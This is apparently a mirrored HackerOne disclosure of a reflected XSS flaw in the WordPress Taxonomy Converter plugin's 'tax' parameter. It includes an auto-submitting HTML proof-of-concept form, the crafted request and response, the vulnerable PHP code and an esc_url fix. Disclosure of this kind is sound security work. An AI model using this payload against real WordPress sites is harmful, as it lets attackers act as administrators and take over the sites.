Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Reflected XSS: Taxonomy Converter via tax parameter

Medium
W
WordPress
Submitted None
Actions:
View on HackerOne
Reported by foobar7

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
CVSS ---- Medium 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) Description ----------- The [Taxonomy Converter](https://wordpress.org/plugins/taxonomy-converter/) that is listed on the [Official WordPress plugins](https://profiles.wordpress.org/wordpressdotorg/#content-plugins) page is vulnerable to reflected XSS as it echoes the `tax` parameter without encoding. POC ---- <html> <body> <form action="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'&quot;><img+src%3dx+onerror%3dalert(1)>&step=2" method="POST" enctype="text/plain"> <input type="hidden" name="test" value="test&#13;&#10;" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Request -------- POST /wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2 HTTP/1.1 Host: 192.168.0.104 [...] test=test HTTP/1.1 200 OK [...] <p>Uh, oh. Something didn&#8217;t work. Please <a href="admin.php?import=wptaxconvert&amp;tax=categoryx\'\"><img src=x onerror=alert(1)>">try again</a>.</p> Code ---- /wp-content/plugins/taxonomy-converter/taxonomy-converter.php function process($tax) { global $wpdb; if ( (!isset($_POST['terms_to_convert']) || !is_array($_POST['terms_to_convert'])) && empty($this->terms_to_convert) || (!isset($_POST['taxes'])) ) { ?> <div class="narrow"> <p><?php printf(__('Uh, oh. Something didn&#8217;t work. Please <a href="%s">try again</a>.', 'wptaxconvert'), 'admin.php?import=wptaxconvert&amp;tax='.$tax); ?></p> </div> <?php return; } Solution -------- Apply `esc_url` or similar to `$tax` before passing it to `printf`. ## Impact With a successful attack, an attacker can access all data the attacked user has access to, as well as perform arbitrary requests in the name of the attacked user. If the attacked user is an administrator, the attacker could for example create a new admin user and thus gain full control of the application (and depending on the settings, the server).

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected